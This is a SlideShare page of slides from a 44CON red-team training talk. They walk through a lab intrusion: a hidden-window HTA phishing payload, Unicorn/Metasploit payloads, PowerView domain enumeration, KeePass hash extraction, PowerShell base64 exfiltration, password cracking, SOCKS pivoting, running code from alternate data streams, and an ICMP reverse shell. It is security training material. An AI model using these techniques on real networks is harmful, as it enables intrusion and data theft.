SlideShare a Scribd company logo

44CON Hacking Enterprises

in.security Ltd., profile picture
in.security Ltd.

The document outlines a range of cyber security consultancy services offered by in.security, including vulnerability assessments, penetration testing, and security training. It provides insights into a structured approach to exploit systems, demonstrating techniques like phishing campaigns, password cracking, and data exfiltration strategies. Additionally, it discusses various tools such as Gophish for phishing, Elasticsearch for monitoring, and techniques for bypassing security measures during engagements.

Technology
Related topics:
Blue Team Red Team
1 of 52
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
44CON Hacking Enterprises
grep ‘in.security’ /etc/groups A cyber security consultancy offering specialist technical and training services Technical • Vulnerability Assessments • Penetration Testing • Red Team Engagements • Social Engineering Engagements • Wireless Security Assessments • Password Audits • Build Reviews • Firewall Reviews © in.security Ltd 2019, all rights reserved
$whoami /all Will Hunt • Co-founder of in.security • 10+ years in cyber • Assists UK Government • Hacker, formerly digital forensics • Trained at various conferences including Black Hat USA/EU • @Stealthsploit • https://stealthsploit.com © in.security Ltd 2019, all rights reserved
$whoami /all Owen Shearing • Co-founder of in.security • 14+ years in technical roles • Trained at various bespoke events and conferences including Black Hat Asia, USA and EU • CREST CCT • @rebootuser • https://rebootuser.com / https://github.com/rebootuser © in.security Ltd 2019, all rights reserved
The LAB The LAB • The MGT network hosts LAB resources for all students to access, including: • Phishing Platform (Gophish) • ELK Stack • CTF Platform • Kali network (attackers) – this is you! • The Dev network - routable from attackers subnet • Two undiscovered, firewalled subnets! + a third subnet unlocked after training completes! © in.security Ltd 2019, all rights reserved MGT Dev Attackers
© in.security Ltd 2019, all rights reserved Topics… © in.security Ltd 2019, all rights reserved MGT A:ackers Dev OSINT techniques IPv4 / IPv6 discovery & enumeration Automated vulnerability scanning Introduction into exploitation frameworks & Mobile devices Linux enumeration, shells, privilege escalation & post exploitation P@ssw0rd cracking (Linux) Windows enumeration Creating & executing a phishing campaign P@ssw0rd cracking (Windows) Windows shells, privilege escalation, post exploitation & info gathering Defensive monitoring Restricted environment breakouts Pivoting and lateral movement Identifying further targets Database/application enumeration & exploitation Domain/trust compromise Persistence & exfiltration
Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
Phishing – Delivery & Payloads Delivery Examples • Email, generic ‘campaign’ or targeted attack (spear phishing) • SMS (Smishing) / Voice (Vishing) • Web based (malicious/hacked website) • Malvertising Payload Examples • Data collection via hosted forms (credentials, personal/sensitive information, payment details) • Spoofing and/or content injection targeting legitimate websites • Embedded code in attached Office documents (Macros, DDE) • Exploiting vulnerabilities in client-side software (Flash, Acrobat, Java) © in.security Ltd 2019, all rights reserved
Gophish – Users & Groups Using Gophish for a phishing campaign: • Targets (Users & Groups tab) • Email template • Landing page • Sending Profile https://docs.getgophish.com/user-guide © in.security Ltd 2019, all rights reserved
Phishing – HTA Files • HTML application • Launched by mshta.exe on Windows “In short, HTAs pack all the power of Internet Explorer - its object model, performance, rendering power and protocol support - without enforcing the strict security model and user interface of the browser” https://docs.microsoft.com/en-us/previous-versions//ms536496(v=vs.85) • A nice overview of HTA/command execution https://9to5it.com/using-html-applications-as-a-powershell-gui/ © in.security Ltd 2019, all rights reserved
Phishing – HTA Files <script language="VBScript"> window.moveTo -4000, -4000 cmd = "powershell.exe -c Test-Connection 10.133.251.10" Set runme = CreateObject("Wscript.Shell") result = runme.Run(cmd, 0, true) window.close() </script> • Cmd – command we are executing • 0 – set to hidden • True - wait for command to complete before continuing © in.security Ltd 2019, all rights reserved
Our 45min Pwnage Plan… <DEMO> © in.security Ltd 2019, all rights reserved [Phishing]
Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
Monitoring & Alerting • Elasticsearch Logstash Kibanna (ELK) https://www.elastic.co/products © in.security Ltd 2019, all rights reserved Kibana - a web-based frontend to allow real-time, visual analysis of collected data in Elasticsearch Elasticsearch – based on Apache Lucene, a NoSQL (JSON based/document store model) database Logstash – a tool to intake, process and output log data from various sources
Monitoring & Alerting • Elasticsearch Logstash Kibanna (ELK) https://www.elastic.co/products © in.security Ltd 2019, all rights reserved Kibana - a web-based frontend to allow real-time, visual analysis of collected data in Elasticsearch Elasticsearch – based on Apache Lucene, a NoSQL (JSON based/document store model) database Logstash – a tool to intake, process and output log data from various sources
Monitoring & Alerting • Elasticsearch Logstash Kibanna (ELK) https://www.elastic.co/products © in.security Ltd 2019, all rights reserved Kibana - a web-based frontend to allow real-time, visual analysis of collected data in Elasticsearch Elasticsearch – based on Apache Lucene, a NoSQL (JSON based/document store model) database Logstash – a tool to intake, process and output log data from various sources
Sysmon • Part of the Sysinternals suite https://docs.microsoft.com/en-gb/sysinternals/downloads/sysmon • A configuration file can be supplied (-i) containing the desired rules • A great template config from @SwiftOnSecurity https://github.com/SwiftOnSecurity/sysmon-config © in.security Ltd 2019, all rights reserved
A/V & AMSI • So, why did our initial phish with msfvenom generated HTA fail? …. • Well, this would be due to Windows Defender/Antimalware Scan Interface © in.security Ltd 2019, all rights reserved
Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Monitoring]
Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
Unicorn • Created by TrustedSec / https://github.com/trustedsec/unicorn • Simple to use, well documented and regularly updated with new techniques/evasion methods • A number of payloads rely on a msf handler listening on the attacking system (all required configs are generated by the tool) © in.security Ltd 2019, all rights reserved
Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Phishing #2]
Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? © in.security Ltd 2019, all rights reserved
Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? • Do we have access to any users with interesting group memberships or delegated rights within the domain? © in.security Ltd 2019, all rights reserved
Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? • Do we have access to any users with interesting group memberships or delegated rights within the domain? • What systems/networks does the compromised host have access to? © in.security Ltd 2019, all rights reserved
Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? • Do we have access to any users with interesting group memberships or delegated rights within the domain? • What systems/networks does the compromised host have access to? • [… • …] • What systems are deemed to hold important/sensitive data? © in.security Ltd 2019, all rights reserved
Information Gathering PowerView • Part of the PowerSploit package https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon OR, for the latest version 3 (development) version https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 • PowerShell script that provides numerous functions for situational awareness and domain enumeration • A great ‘cheatsheet’ on functions and usage by @harmj0y https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 • Functions include: Get-DomainUser, Get-DomainGroup, Get-DomainGroupMember Get-NetDomain, Get-DomainPolicy, Get-DomainTrust, Get-DomainComputer, Find-DomainShare + LOADS more © in.security Ltd 2019, all rights reserved
Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Enumeration]
Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
Password Managers - KeePass © in.security Ltd 2019, all rights reserved • Password managers/vaults are often used to store privileged credentials and information • KeePass uses .kdb files (v1) and .kdbx files (v2) to store the database • We can’t just give the file to a password cracker so we need to extract the hash • keepass2john can do this and it comes shipped with Kali • We could then either install KeePass and load the database, or access directly over the command line using a tool like kpcli
How Can We Exfil The DataZ? © in.security Ltd 2019, all rights reserved Transferring files using PowerShell $FileName = “<target_file>” $base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes($FileName)) ReadAllBytes – Opens a binary file, reads the contents into a byte array and closes the file* * https://docs.microsoft.com/en-us/dotnet/api/system.io.file.readallbytes
Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Exfiltration]
Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
Offline Password Cracking Success depends on a number of factors • Algorithm complexity • Password length / complexity • Hardware (GPU/FPGA/ASIC) Password cracking process • Hash the clear text candidate • Compare to stolen hash • No match? Start again • Match = Win! © in.security Ltd 2019, all rights reserved
Brute Force Attack © in.security Ltd 2019, all rights reserved • Try every possible combination of every character • Not used 99% of the time… Pros • 100% GUARANTEED to crack Cons • You likely won’t be around to see it happen!
Brute Force Attack • Key space = char set ^ length • 8x NVIDIA GTX 1080 Ti GPUs - Windows passwords @ 513 GH/s* (full 95 char set) • 8 char NTLM = 3.5 hours • 9 char NTLM = 14 days • 10 char NTLM = 3.7 years • 11 char NTLM = 351 years • 12 char NTLM = 33,401 years • 13 char NTLM = 3.2 million years © in.security Ltd 2019, all rights reserved *h:ps://gist.github.com/epixoip/ace60d09981be09544fdd35005051505
Dictionary Attack © in.security Ltd 2019, all rights reserved Wordlist Rules insecurity Insecurity Password 1nsecurity monkey ins3curity! 1234567 Ins3cur1ty Qwerty in53cur!ty letmein • Wordlist contains password candidates • Most commonly used • Can be mangled with rules Pros • Wordlists contain common passwords • Mangling addresses the human element Cons • Only as good as your dictionary/rules
Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Cracking]
Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
Routing in Metasploit • Traffic to target networks can be routed over existing sessions… • To add a route route add <$network> <$mask> <$sessionID> © in.security Ltd 2019, all rights reserved
SOCKS Proxies • A server that can establish a connection to a destination on behalf of a client • Metasploit SOCKS modules auxiliary/server/socks4a auxiliary/server/socks5 ”This module provides a socksx proxy server that uses the built-in Metasploit routing to relay connections” * • This functionality allows programs external to Metasploit, to utilise configured routes within msf and gain access to the target system(s)/network(s) …with the help of proxychains © in.security Ltd 2019, all rights reserved
SOCKS Proxies & Proxychains • Proxychains / http://proxychains.sourceforge.net • Allows/supports TCP (not UDP - with the exception of DNS) • Used to allow *any program to run through a SOCKS proxy • Configuration file @ /etc/proxychains.conf • Then run a program through the proxy! proxychains smbclient -W insec-xxxx.local //10.133.50.xxx/<$fileshare> -U <$targetUser>%<$password> © in.security Ltd 2019, all rights reserved
Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [SOCKS & Shellz]
Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
Hiding Data • Alternate Data Streams (ADS) allow one file system entry to contain multiple data sets (NTFS only) • Original file is always the ‘main’ stream, additional streams are appended to filename and are colon delimited File.txt File.txt:secretdata.txt:$DATA File.txt:shell.exe:$DATA • One option to trigger – wmic process call create File.txt:shell.exe • A nice article by Oddvar Moe on executing files from ADS https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ © in.security Ltd 2019, all rights reserved
Exfiltrating Data Over ICMP © in.security Ltd 2019, all rights reserved • ICMP doesn’t use ports (types) and is often left enabled, forgotten and not monitored • Overcomes network egress issues when usual channels are blocked • icmpsh is a reverse ICMP shell (https://github.com/inquisb/icmpsh) • Server works in C, Perl, Python • Client is Win32 • We have to disable ICMP replies from the attacking host and then start the ICMP server sysctl -w net.ipv4.icmp_echo_ignore_all=1
Our 45min-ish Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [ADS & OOB ICMP… If time persists!]
Our 45min Pwnage Plan… Phish Kibana Phish#2 Enumeration Exfiltration Password Cr@cK5 SOCKS Proxies OOB Persistence © in.security Ltd 2019, all rights reserved
Our 45min Pwnage Plan… </DEMO> © in.security Ltd 2019, all rights reserved
Much, Much More… © in.security Ltd 2019, all rights reserved June 6th/7th @44CON h9ps://44con.com/44con-training/hacking-enterprises-exploiCng-insecurity/

More Related Content

PPTX
How to write secure code
Flaskdata.io
 
PPTX
Red teaming in the cloud
Peter Wood
 
PDF
Hacking SIP Like a Boss!
Fatih Ozavci
 
PDF
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Cybereason
 
PDF
Activated Charcoal - Making Sense of Endpoint Data
Greg Foss
 
PDF
5 step plan to securing your APIs
💻 Javier Garza
 
PDF
VoIP Wars: Attack of the Cisco Phones
Fatih Ozavci
 
PDF
Novinky F5
MarketingArrowECS_CZ
 
How to write secure code
Flaskdata.io
 
Red teaming in the cloud
Peter Wood
 
Hacking SIP Like a Boss!
Fatih Ozavci
 
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Cybereason
 
Activated Charcoal - Making Sense of Endpoint Data
Greg Foss
 
5 step plan to securing your APIs
💻 Javier Garza
 
VoIP Wars: Attack of the Cisco Phones
Fatih Ozavci
 
Novinky F5
MarketingArrowECS_CZ
 

What's hot (19)

PPTX
OWASP Atlanta 2018: Forensics as a Service
Toni de la Fuente
 
PDF
VoIP Wars: The Phreakers Awaken
Fatih Ozavci
 
PDF
VoIP Wars: Destroying Jar Jar Lync (Filtered version)
Fatih Ozavci
 
PPTX
End-to-Eend security with Palo Alto Networks (Onur Kasap, Palo Alto Networks)
BAKOTECH
 
PDF
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
Fatih Ozavci
 
PPT
Presentacion Palo Alto Networks
Laurent Daudré-Vignier
 
PDF
VMworld 2013: VMware NSX with Next-Generation Security by Palo Alto Networks
VMworld
 
PDF
F5 DDoS Protection
MarketingArrowECS_CZ
 
PDF
F5 Web Application Security
MarketingArrowECS_CZ
 
PPTX
Prowler: BlackHat Europe Arsenal 2018
Toni de la Fuente
 
PPTX
Why choose pan
Achmad Yudo
 
PPTX
Palo Alto Networks 28.5.2013
Belsoft
 
PDF
F5 TMOS v13.0
MarketingArrowECS_CZ
 
PDF
Palo Alto Networks y la tecnología de Next Generation Firewall
Mundo Contact
 
PPTX
VoIP – vulnerabilities and attacks
n|u - The Open Security Community
 
PDF
Departed Communications: Learn the ways to smash them!
Fatih Ozavci
 
PDF
MBFuzzer : MITM Fuzzing for Mobile Applications
Fatih Ozavci
 
PDF
Preparing for the Imminent Terabit DDoS Attack
Imperva
 
PDF
BlackHat Hacking - Hacking VoIP.
Sumutiu Marius
 
OWASP Atlanta 2018: Forensics as a Service
Toni de la Fuente
 
VoIP Wars: The Phreakers Awaken
Fatih Ozavci
 
VoIP Wars: Destroying Jar Jar Lync (Filtered version)
Fatih Ozavci
 
End-to-Eend security with Palo Alto Networks (Onur Kasap, Palo Alto Networks)
BAKOTECH
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
Fatih Ozavci
 
Presentacion Palo Alto Networks
Laurent Daudré-Vignier
 
VMworld 2013: VMware NSX with Next-Generation Security by Palo Alto Networks
VMworld
 
F5 DDoS Protection
MarketingArrowECS_CZ
 
F5 Web Application Security
MarketingArrowECS_CZ
 
Prowler: BlackHat Europe Arsenal 2018
Toni de la Fuente
 
Why choose pan
Achmad Yudo
 
Palo Alto Networks 28.5.2013
Belsoft
 
F5 TMOS v13.0
MarketingArrowECS_CZ
 
Palo Alto Networks y la tecnología de Next Generation Firewall
Mundo Contact
 
VoIP – vulnerabilities and attacks
n|u - The Open Security Community
 
Departed Communications: Learn the ways to smash them!
Fatih Ozavci
 
MBFuzzer : MITM Fuzzing for Mobile Applications
Fatih Ozavci
 
Preparing for the Imminent Terabit DDoS Attack
Imperva
 
BlackHat Hacking - Hacking VoIP.
Sumutiu Marius
 

Similar to 44CON Hacking Enterprises (20)

PDF
Zero Day Malware Detection/Prevention Using Open Source Software
MyNOG
 
PPTX
Application security meetup k8_s security with zero trust_29072021
lior mazor
 
PDF
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Codemotion
 
PDF
Guide of authentication and authorization for cloud native applications with ...
Hitachi, Ltd. OSS Solution Center.
 
PPTX
Meeting rooms are talking. Are you listening
Cisco DevNet
 
PDF
The Whys and Hows of Deploying a Secure RPA Solution
Option3
 
PPTX
Man in the Cloud Attacks
Imperva
 
PPTX
Rome 2017: Building advanced voice assistants and chat bots
Cisco DevNet
 
PPTX
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Codemotion
 
PPTX
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Codemotion
 
PDF
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Luca Bongiorni
 
PDF
IT Camp 19: Top Azure security fails and how to avoid them
Karl Ots
 
PDF
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
NoNameCon
 
PDF
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
Codemotion
 
PDF
Emulators as an Emerging Best Practice for API Providers
Cisco DevNet
 
PDF
PKI in DevOps: How to Deploy Certificate Automation within CI/CD
DevOps.com
 
PPTX
Meeting rooms are talking! are you listening?
Cisco DevNet
 
PDF
Keeping your collaboration safe while working remotely
Cisco Webex
 
PDF
BRKSEC-3144.pdf
HaitamSouissi1
 
PDF
Secure coding guidelines
Zakaria SMAHI
 
Zero Day Malware Detection/Prevention Using Open Source Software
MyNOG
 
Application security meetup k8_s security with zero trust_29072021
lior mazor
 
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Codemotion
 
Guide of authentication and authorization for cloud native applications with ...
Hitachi, Ltd. OSS Solution Center.
 
Meeting rooms are talking. Are you listening
Cisco DevNet
 
The Whys and Hows of Deploying a Secure RPA Solution
Option3
 
Man in the Cloud Attacks
Imperva
 
Rome 2017: Building advanced voice assistants and chat bots
Cisco DevNet
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Codemotion
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Codemotion
 
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Luca Bongiorni
 
IT Camp 19: Top Azure security fails and how to avoid them
Karl Ots
 
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
NoNameCon
 
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
Codemotion
 
Emulators as an Emerging Best Practice for API Providers
Cisco DevNet
 
PKI in DevOps: How to Deploy Certificate Automation within CI/CD
DevOps.com
 
Meeting rooms are talking! are you listening?
Cisco DevNet
 
Keeping your collaboration safe while working remotely
Cisco Webex
 
BRKSEC-3144.pdf
HaitamSouissi1
 
Secure coding guidelines
Zakaria SMAHI
 

Recently uploaded (20)

PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
PPT
Module 1.ppt Iot fundamentals and Architecture
nanditha7766
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PDF
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
PDF
Architecture types and enterprise applications.pdf
ChristopherTHyatt
 
PDF
TrustArc Webinar - Click, Consent, Trust: Winning the Privacy Game
TrustArc
 
PDF
2021 HotChips TSMC Packaging Technologies for Chiplets and 3D_0819 publish_pu...
KeXue5
 
PDF
A contest of sentiment analysis: k-nearest neighbor versus neural network
IAESIJAI
 
PDF
Zenith AI: Advanced Artificial Intelligence
Biz Preneurs
 
PDF
Hindi spoken digit analysis for native and non-native speakers
IAESIJAI
 
PPTX
observCloud-Native Containerability and monitoring.pptx
anupsingh76937
 
PDF
NewMind AI Weekly Chronicles – August ’25 Week III
NewMind AI
 
PDF
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
PDCA Consulting
 
PDF
Developing a website for English-speaking practice to English as a foreign la...
IAESIJAI
 
PDF
A novel scalable deep ensemble learning framework for big data classification...
IAESIJAI
 
PDF
Getting started with AI Agents and Multi-Agent Systems
Maxim Salnikov
 
PDF
project resource management chapter-09.pdf
ssuser00e6e21
 
PDF
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
PPTX
MicrosoftCybserSecurityReferenceArchitecture-April-2025.pptx
SilvioHayashi
 
PPTX
O2C Customer Invoices to Receipt V15A.pptx
ssuserbfa915
 
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
Module 1.ppt Iot fundamentals and Architecture
nanditha7766
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
Architecture types and enterprise applications.pdf
ChristopherTHyatt
 
TrustArc Webinar - Click, Consent, Trust: Winning the Privacy Game
TrustArc
 
2021 HotChips TSMC Packaging Technologies for Chiplets and 3D_0819 publish_pu...
KeXue5
 
A contest of sentiment analysis: k-nearest neighbor versus neural network
IAESIJAI
 
Zenith AI: Advanced Artificial Intelligence
Biz Preneurs
 
Hindi spoken digit analysis for native and non-native speakers
IAESIJAI
 
observCloud-Native Containerability and monitoring.pptx
anupsingh76937
 
NewMind AI Weekly Chronicles – August ’25 Week III
NewMind AI
 
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
PDCA Consulting
 
Developing a website for English-speaking practice to English as a foreign la...
IAESIJAI
 
A novel scalable deep ensemble learning framework for big data classification...
IAESIJAI
 
Getting started with AI Agents and Multi-Agent Systems
Maxim Salnikov
 
project resource management chapter-09.pdf
ssuser00e6e21
 
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
MicrosoftCybserSecurityReferenceArchitecture-April-2025.pptx
SilvioHayashi
 
O2C Customer Invoices to Receipt V15A.pptx
ssuserbfa915
 

44CON Hacking Enterprises

  • 2. grep ‘in.security’ /etc/groups A cyber security consultancy offering specialist technical and training services Technical • Vulnerability Assessments • Penetration Testing • Red Team Engagements • Social Engineering Engagements • Wireless Security Assessments • Password Audits • Build Reviews • Firewall Reviews © in.security Ltd 2019, all rights reserved
  • 3. $whoami /all Will Hunt • Co-founder of in.security • 10+ years in cyber • Assists UK Government • Hacker, formerly digital forensics • Trained at various conferences including Black Hat USA/EU • @Stealthsploit • https://stealthsploit.com © in.security Ltd 2019, all rights reserved
  • 4. $whoami /all Owen Shearing • Co-founder of in.security • 14+ years in technical roles • Trained at various bespoke events and conferences including Black Hat Asia, USA and EU • CREST CCT • @rebootuser • https://rebootuser.com / https://github.com/rebootuser © in.security Ltd 2019, all rights reserved
  • 5. The LAB The LAB • The MGT network hosts LAB resources for all students to access, including: • Phishing Platform (Gophish) • ELK Stack • CTF Platform • Kali network (attackers) – this is you! • The Dev network - routable from attackers subnet • Two undiscovered, firewalled subnets! + a third subnet unlocked after training completes! © in.security Ltd 2019, all rights reserved MGT Dev Attackers
  • 6. © in.security Ltd 2019, all rights reserved Topics… © in.security Ltd 2019, all rights reserved MGT A:ackers Dev OSINT techniques IPv4 / IPv6 discovery & enumeration Automated vulnerability scanning Introduction into exploitation frameworks & Mobile devices Linux enumeration, shells, privilege escalation & post exploitation P@ssw0rd cracking (Linux) Windows enumeration Creating & executing a phishing campaign P@ssw0rd cracking (Windows) Windows shells, privilege escalation, post exploitation & info gathering Defensive monitoring Restricted environment breakouts Pivoting and lateral movement Identifying further targets Database/application enumeration & exploitation Domain/trust compromise Persistence & exfiltration
  • 7. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 8. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 9. Phishing – Delivery & Payloads Delivery Examples • Email, generic ‘campaign’ or targeted attack (spear phishing) • SMS (Smishing) / Voice (Vishing) • Web based (malicious/hacked website) • Malvertising Payload Examples • Data collection via hosted forms (credentials, personal/sensitive information, payment details) • Spoofing and/or content injection targeting legitimate websites • Embedded code in attached Office documents (Macros, DDE) • Exploiting vulnerabilities in client-side software (Flash, Acrobat, Java) © in.security Ltd 2019, all rights reserved
  • 10. Gophish – Users & Groups Using Gophish for a phishing campaign: • Targets (Users & Groups tab) • Email template • Landing page • Sending Profile https://docs.getgophish.com/user-guide © in.security Ltd 2019, all rights reserved
  • 11. Phishing – HTA Files • HTML application • Launched by mshta.exe on Windows “In short, HTAs pack all the power of Internet Explorer - its object model, performance, rendering power and protocol support - without enforcing the strict security model and user interface of the browser” https://docs.microsoft.com/en-us/previous-versions//ms536496(v=vs.85) • A nice overview of HTA/command execution https://9to5it.com/using-html-applications-as-a-powershell-gui/ © in.security Ltd 2019, all rights reserved
  • 12. Phishing – HTA Files <script language="VBScript"> window.moveTo -4000, -4000 cmd = "powershell.exe -c Test-Connection 10.133.251.10" Set runme = CreateObject("Wscript.Shell") result = runme.Run(cmd, 0, true) window.close() </script> • Cmd – command we are executing • 0 – set to hidden • True - wait for command to complete before continuing © in.security Ltd 2019, all rights reserved
  • 13. Our 45min Pwnage Plan… <DEMO> © in.security Ltd 2019, all rights reserved [Phishing]
  • 14. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 15. Monitoring & Alerting • Elasticsearch Logstash Kibanna (ELK) https://www.elastic.co/products © in.security Ltd 2019, all rights reserved Kibana - a web-based frontend to allow real-time, visual analysis of collected data in Elasticsearch Elasticsearch – based on Apache Lucene, a NoSQL (JSON based/document store model) database Logstash – a tool to intake, process and output log data from various sources
  • 16. Monitoring & Alerting • Elasticsearch Logstash Kibanna (ELK) https://www.elastic.co/products © in.security Ltd 2019, all rights reserved Kibana - a web-based frontend to allow real-time, visual analysis of collected data in Elasticsearch Elasticsearch – based on Apache Lucene, a NoSQL (JSON based/document store model) database Logstash – a tool to intake, process and output log data from various sources
  • 17. Monitoring & Alerting • Elasticsearch Logstash Kibanna (ELK) https://www.elastic.co/products © in.security Ltd 2019, all rights reserved Kibana - a web-based frontend to allow real-time, visual analysis of collected data in Elasticsearch Elasticsearch – based on Apache Lucene, a NoSQL (JSON based/document store model) database Logstash – a tool to intake, process and output log data from various sources
  • 18. Sysmon • Part of the Sysinternals suite https://docs.microsoft.com/en-gb/sysinternals/downloads/sysmon • A configuration file can be supplied (-i) containing the desired rules • A great template config from @SwiftOnSecurity https://github.com/SwiftOnSecurity/sysmon-config © in.security Ltd 2019, all rights reserved
  • 19. A/V & AMSI • So, why did our initial phish with msfvenom generated HTA fail? …. • Well, this would be due to Windows Defender/Antimalware Scan Interface © in.security Ltd 2019, all rights reserved
  • 20. Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Monitoring]
  • 21. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 22. Unicorn • Created by TrustedSec / https://github.com/trustedsec/unicorn • Simple to use, well documented and regularly updated with new techniques/evasion methods • A number of payloads rely on a msf handler listening on the attacking system (all required configs are generated by the tool) © in.security Ltd 2019, all rights reserved
  • 23. Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Phishing #2]
  • 24. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 25. Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? © in.security Ltd 2019, all rights reserved
  • 26. Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? • Do we have access to any users with interesting group memberships or delegated rights within the domain? © in.security Ltd 2019, all rights reserved
  • 27. Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? • Do we have access to any users with interesting group memberships or delegated rights within the domain? • What systems/networks does the compromised host have access to? © in.security Ltd 2019, all rights reserved
  • 28. Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? • Do we have access to any users with interesting group memberships or delegated rights within the domain? • What systems/networks does the compromised host have access to? • [… • …] • What systems are deemed to hold important/sensitive data? © in.security Ltd 2019, all rights reserved
